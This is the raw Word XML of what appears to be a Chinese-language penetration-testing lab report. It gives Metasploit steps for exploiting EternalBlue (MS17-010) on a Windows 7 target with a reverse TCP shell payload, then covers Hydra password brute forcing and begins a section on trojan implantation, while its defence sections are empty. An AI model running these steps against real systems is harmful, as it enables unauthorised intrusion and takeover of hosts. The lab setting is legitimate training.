          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E71FA" w14:textId="06CE1FFD" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>防方系统环境：</w:t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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC3DEEF" w14:textId="2CADE0E9" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc76889953"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>2.3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操作步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="6544EADE" w14:textId="77777777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漏洞：永恒之蓝漏洞、SMB漏洞 #139、445端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BEF259" w14:textId="77777777" w:rsid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 xml:space="preserve">工具：msf（瑞士军刀） </w:t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</w:p>
    <w:p w14:paraId="1FF329A2" w14:textId="59B88479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# show options # 显示配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90DD4E" w14:textId="77777777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msfconsole</w:t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  <w:t xml:space="preserve">#msf启动 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2686CEAE" w14:textId="4B56BDB4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use + 模块</w:t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 xml:space="preserve">#使用模块 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3BEC8" w14:textId="11A55E5E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 xml:space="preserve">1） search name:ms17-010 type:auxiliary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>#查找模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018AF7F2" w14:textId="77777777" w:rsid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 xml:space="preserve">2） use auxiliary/scanner/smb/smb_ms17_010 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AAC2C4" w14:textId="1021F399" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:ind w:left="5040" w:firstLine="420"/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#使用这个模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFEB750" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t xml:space="preserve">3） run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CB574B" w14:textId="77777777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4） back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0D348" w14:textId="73845EF8" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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 xml:space="preserve">5） search ms17-010 type:exploit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 xml:space="preserve"># 查找 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B609D9" w14:textId="77777777" w:rsid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 xml:space="preserve">6） use exploit/windows/smb/ms17_010_eternalblue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34162E86" w14:textId="66CBF655" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:ind w:left="2100" w:firstLine="420"/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#使用这个模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52039B74" w14:textId="77777777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7） set rhosts 192.168.x.103 #设置目的IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F83A2" w14:textId="09A43F5A" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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 xml:space="preserve">8） search type:payload windows/x64/shell </w:t>
      </w:r>
      <w:r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>#查找模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419DD88" w14:textId="77777777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9） use payload/windows/x64/shell/reverse_tcp #使用载荷模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5471AB" w14:textId="683F49E1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 xml:space="preserve">10）show options </w:t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>#查看该模板参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359956A2" w14:textId="0D99E0B5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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">set lhost 192.168.128.146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>#设置主机ip地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D5074" w14:textId="4BD09BEE" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">back </w:t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4434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">#退出该模块 use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A26BC" w14:textId="050BB86C" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11） exploit/windows/smb/ms17_010_eternablue #使用渗透模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C52C2" w14:textId="2DAEC487" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc76889954"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>2.4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验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="24B638D9" w14:textId="6A515DAA" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>验证成功；可以利用该漏洞反弹得到一个目标主机的Shell；后续进行提权进而控制目标主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FD7D0" w14:textId="0F6AF2C5" w:rsidR="005E252A" w:rsidRPr="00A72932" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc76889955"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>2.5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防守措施</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="57D6F970" w14:textId="5C4F053A" w:rsidR="005E252A" w:rsidRPr="00A72932" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc76889956"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>2.6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再次验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="04FCBA52" w14:textId="77777777" w:rsidR="005E252A" w:rsidRPr="005E252A" w:rsidRDefault="005E252A" w:rsidP="00A45519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B6698C" w14:textId="5E886187" w:rsidR="00A45519" w:rsidRPr="00A72932" w:rsidRDefault="00A45519" w:rsidP="00A45519">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc76889957"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="1A843351" w14:textId="4E832E34" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc76889958"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>3.1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原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="05DB80B2" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>蛮力攻击（英语：Brute-force attack），又称为穷举攻击（英语：Exhaustive attack）或暴力破解，是一种</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="密码分析" w:history="1">
        <w:r w:rsidRPr="008C0A76">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>密码分析</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的方法，即将密码进行逐个推算直到找出真正的密码为止。例如：一个已知是四位数并且全部由</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tooltip="阿拉伯数字" w:history="1">
        <w:r w:rsidRPr="008C0A76">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>阿拉伯数字</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>组成的密码，其可能共有10000种组合，因此最多尝试9999次就能找到正确的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19906CDD" w14:textId="18EAE18C" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>理论上除了具有</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="完善保密性" w:history="1">
        <w:r w:rsidRPr="008C0A76">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>完善保密性</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的密码以外，利用这种方法可以破解任何一种密码，问题只在于如何缩短试误时间。有些人运用</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tooltip="计算机" w:history="1">
        <w:r w:rsidRPr="008C0A76">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>计算机</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>来增加效率，有些人透过</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="008C0A76">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>字典攻击</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C0A76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>来缩小密码组合的范围。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB16043" w14:textId="0B28CE12" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc76889959"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>3.2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双方软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="3476EF47" w14:textId="77777777" w:rsidR="00CD6071" w:rsidRPr="00C54B87" w:rsidRDefault="00CD6071" w:rsidP="00CD6071">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻方系统和软件环境：</w:t>
      </w:r>
      <w:r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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali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+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Nmap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+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Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37764E26" w14:textId="2D6D985E" w:rsidR="008C0A76" w:rsidRPr="00CD6071" w:rsidRDefault="00CD6071" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>防方系统环境：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54B87"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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6C485" w14:textId="50A0D7D4" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc76889960"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>3.3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操作步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4584B98E" w14:textId="42E11D1F" w:rsidR="008C0A76" w:rsidRPr="00CD6071" w:rsidRDefault="00CD6071" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD6071">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hydra（九头蛇）工具：设置好目标主机的IP地址和要破解的漏洞端口以及用户名字典和密码字典；点击破解就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336DD9C4" w14:textId="0FCF58C0" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc76889961"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>3.4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验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="208C8143" w14:textId="109CEDD2" w:rsidR="008C0A76" w:rsidRDefault="00CD6071" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD6071">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>验证成功，可以破解弱口令（简单的密码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C3CE5" w14:textId="21E80196" w:rsidR="00CD6071" w:rsidRPr="00CD6071" w:rsidRDefault="00CD6071" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD6071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0ADA6D7D" wp14:editId="7B9EF4FB">
            <wp:extent cx="5274310" cy="2819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F791" w14:textId="4947B411" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc76889962"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>3.5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防守措施</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5ED3CA03" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3112619E" w14:textId="7DF9CD1F" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc76889963"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>3.6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再次验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="733F1E03" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F13F83" w14:textId="10C05626" w:rsidR="00A45519" w:rsidRPr="00A72932" w:rsidRDefault="00A45519" w:rsidP="00A45519">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc76889964"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>木马植入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="7E5C7AC5" w14:textId="576F4DC1" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc76889965"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>4.1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原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="6406B7E8" w14:textId="28C77E36" w:rsidR="008C0A76" w:rsidRPr="00EB6868" w:rsidRDefault="00EB6868" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
